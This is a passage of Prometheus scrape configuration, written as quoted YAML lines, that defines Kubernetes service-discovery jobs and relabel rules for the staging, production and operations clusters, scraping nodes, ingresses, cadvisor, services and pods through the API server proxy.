' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-ingresses',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: ingress',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_ingress_path',
' target_label: __address__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_ingress_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_name',
' target_label: kubernetes_ingress_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-cadvisor',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: node',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs:',
' - action: replace',
' regex: ^/machine\\.slice/machine-rkt\\\\x2d([^\\\\]+)\\\\.+/([^/]+)\\.service$',
' replacement: ${2}-${1}',
' source_labels:',
' - id',
' target_label: rkt_container_name',
' - action: replace',
' regex: ^/system\\.slice/(.+)\\.service$',
' replacement: ${1}',
' source_labels:',
' - id',
' target_label: systemd_service_name',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics/cadvisor',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-service-endpoints',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: endpoints',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs: []',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_scrape',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' source_labels:',
' - __address__',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-services',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: service',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __param_target',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' - action: replace',
' regex: reverse.default.svc:443',
' replacement: https_401',
' source_labels:',
' - __param_target',
' target_label: __param_module',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-pods-default',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: pod',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_scrape',
' - action: drop',
' regex: .+',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_interval',
' - action: replace',
' regex: (.+)',
" replacement: 'false'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - action: keep',
' regex: (false;.*)|(true;.*metrics)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_name',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_number',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_port',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_name',
' target_label: kubernetes_container_name',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_pod_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_pod_name',
' target_label: kubernetes_pod_name',
' - action: replace',
" replacement: ''",
' target_label: pod_template_hash',
' - action: replace',
" replacement: ''",
' target_label: controller_revision_hash',
' - action: replace',
" replacement: ''",
' target_label: pod_template_generation',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-nodes',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: node',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-ingresses',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: ingress',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_ingress_path',
' target_label: __address__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_ingress_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_name',
' target_label: kubernetes_ingress_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-cadvisor',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: node',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs:',
' - action: replace',
' regex: ^/machine\\.slice/machine-rkt\\\\x2d([^\\\\]+)\\\\.+/([^/]+)\\.service$',
' replacement: ${2}-${1}',
' source_labels:',
' - id',
' target_label: rkt_container_name',
' - action: replace',
' regex: ^/system\\.slice/(.+)\\.service$',
' replacement: ${1}',
' source_labels:',
' - id',
' target_label: systemd_service_name',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics/cadvisor',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-service-endpoints',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: endpoints',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs: []',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_scrape',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' source_labels:',
' - __address__',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-services',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: service',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __param_target',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-pods-default',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: pod',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_scrape',
' - action: drop',
' regex: .+',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_interval',
' - action: replace',
' regex: (.+)',
" replacement: 'false'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - action: keep',
' regex: (false;.*)|(true;.*metrics)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_name',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_number',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_port',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_name',
' target_label: kubernetes_container_name',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_pod_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_pod_name',
' target_label: kubernetes_pod_name',
' - action: replace',
" replacement: ''",
' target_label: pod_template_hash',
' - action: replace',
" replacement: ''",
' target_label: controller_revision_hash',
' - action: replace',
" replacement: ''",
' target_label: pod_template_generation',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-nodes',
' kubernetes_sd_configs:',
' - role: node',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-ingresses',
' kubernetes_sd_configs:',
' - role: ingress',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_ingress_path',
' target_label: __address__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_ingress_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_name',
' target_label: kubernetes_ingress_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-cadvisor',
' kubernetes_sd_configs:',
' - role: node',
' metric_relabel_configs:',
' - action: replace',
' regex: ^/machine\\.slice/machine-rkt\\\\x2d([^\\\\]+)\\\\.+/([^/]+)\\.service$',
' replacement: ${2}-${1}',
' source_labels:',
' - id',
' target_label: rkt_container_name',
' - action: replace',
' regex: ^/system\\.slice/(.+)\\.service$',
' replacement: ${1}',
' source_labels:',
' - id',
' target_label: systemd_service_name',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics/cadvisor',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-service-endpoints',
' kubernetes_sd_configs:',
' - role: endpoints',
' metric_relabel_configs: []',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_scrape',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' source_labels:',
' - __address__',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-services',
' kubernetes_sd_configs:',
' - role: service',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __param_target',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-pods-default',
' kubernetes_sd_configs:',
' - role: pod',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_scrape',
' - action: drop',
' regex: .+',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_interval',
' - action: replace',
' regex: (.+)',
" replacement: 'false'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - action: keep',
' regex: (false;.*)|(true;.*metrics)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_name',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_number',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_port',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_name',
' target_label: kubernetes_container_name',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_pod_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_pod_name',
' target_label: kubernetes_pod_name',
' - action: replace',
" replacement: ''",
' target_label: pod_template_hash',
' - action: replace',
" replacement: ''",
' target_label: controller_revision_hash',
' - action: replace',
" replacement: ''",
' target_label: pod_template_generation',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-pods-long',
' kubernetes_sd_configs:',
' - role: pod',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_scrape',
' - action: keep',
' regex: long',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_interval',
' - action: replace',
' regex: (.+)',
" replacement: 'false'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - action: keep',
' regex: (false;.*)|(true;.*metrics)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_name',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_number',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_port',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_name',
' target_label: kubernetes_container_name',
' - action: replace',
' regex: (.+)',
' source_labels:',
